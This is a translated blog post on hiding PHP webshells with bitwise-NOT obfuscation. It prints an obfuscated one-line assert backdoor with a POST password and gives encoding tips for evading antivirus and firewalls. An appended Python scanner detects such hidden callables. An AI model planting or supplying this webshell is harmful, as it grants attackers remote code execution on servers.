1) PHP ~ Bitwise operators
PHP: Bitwise operators - http://www.php.net/manual/zh/language.operators.bitwise.php
Some time ago, a foreigner posted something interesting on Twitter: a script containing a string of apparently garbled characters that, when accessed, output 1337 as normal. That led to the research results below.
- ~ $a   Not (bitwise inversion): bits that are 0 in $a are set to 1, and vice versa.
The php.ini setting error_reporting takes a bitwise value, which gives a real-world example of turning a single bit off. To display all errors except notices, php.ini uses: E_ALL & ~E_NOTICE
This works as follows. First take the value of E_ALL: 00000000000000000111011111111111
Then take the value of E_NOTICE: 00000000000000000000000000001000
Then invert it with ~: 11111111111111111111111111110111
Finally, use bitwise AND (&) to keep the bits that are set (1) in both values: 00000000000000000111011111110111
2) Analysis and reproduction
This is the effect of the original code at the time:
On seeing this effect, the first thing that comes to mind is backdoors that use it to bypass firewalls and similar defenses, and the next question is which encoding method is used.
Later, while testing with Li pujun, I used echo ~'1'; directly, and the 'garbled' text above was output. The explanation of the ~ operator suddenly became clear.
Then we can start writing a one-line backdoor to try the effect:
<?php$x=~Ÿ¬¬º«;$x($_POST[~¹¹ÏÏÏÏ]);?>
Here, the $x variable is defined as ASSERT and the password is FF0000, so the backdoor can be connected to directly. Because bitwise inversion is what produces the 'garbled' text, inverting it once more returns the normal value.
3) Encoding and AV evasion
When I reproduced this backdoor, I found that copying it over directly gave HTTP status 500. The cause is an encoding problem: the 'garbled' text above is actually Western European (ISO-8859-15).
In practice, we have encountered many backdoors that could not be connected to, returning error 500 because of encoding problems. If the default encoding cannot be identified, save the file with this encoding (GBK, UTF-8, ... cannot be used successfully).
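For defenders, the two points above (the second inversion restores the hidden name, and the payload only exists as raw single-byte data) suggest a simple file scanner. The following is an added example, not code from the original post: it reads PHP source as bytes, finds `~` applied to runs of high bytes, inverts them, and reports what they hide. The watchlist, function names and sample input are assumptions made for illustration.

```python
import re

# Assumed watchlist of PHP callables often abused by webshells (not from the page).
SUSPICIOUS = {"assert", "eval", "system", "exec", "passthru", "shell_exec",
              "popen", "proc_open", "create_function", "call_user_func"}

# '~' applied to a run of high bytes: quoted, or a bare constant as in the page's sample.
NOT_RUN = re.compile(rb"~\s*(?:(['\"])([\x80-\xff]+)\1|([\x80-\xff]{2,}))")


def invert(data: bytes) -> bytes:
    """Bitwise NOT of every byte, which is what PHP's ~ does to a string."""
    return bytes(b ^ 0xFF for b in data)


def scan_php(source: bytes):
    """Return (offset, decoded_text, is_suspicious) for each hidden ASCII string."""
    findings = []
    for m in NOT_RUN.finditer(source):
        decoded = invert(m.group(2) or m.group(3))
        # Keep only runs that invert to printable ASCII; 3-byte UTF-8 text
        # after '~', for example, inverts to control characters and is dropped.
        if all(0x20 <= b < 0x7F for b in decoded):
            text = decoded.decode("ascii")
            findings.append((m.start(), text, text.lower() in SUSPICIOUS))
    return findings


def constructed_sample() -> bytes:
    """Constructed input shaped like the page's one-liner, built as raw bytes."""
    return (b"<?php $x=~" + invert(b"ASSERT") + b";$x($_POST[~"
            + invert(b"FF0000") + b"]);?>")


if __name__ == "__main__":
    # Real files must be opened with open(path, "rb"): decoding them as text
    # and re-saving in another charset changes the bytes being inspected.
    for offset, text, bad in scan_php(constructed_sample()):
        flag = "  <-- suspicious callable" if bad else ""
        print(f"offset {offset}: ~ hides {text!r}{flag}")
```

A hit that decodes to printable text but is not on the watchlist (such as the POST key here) is still worth reviewing, since legitimate code rarely applies `~` to a byte string.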
Author: Evi1m0 [Email: evi1m0 # ff0000.cc]
From: evil Red Information Security Organization [FF0000 TeAm]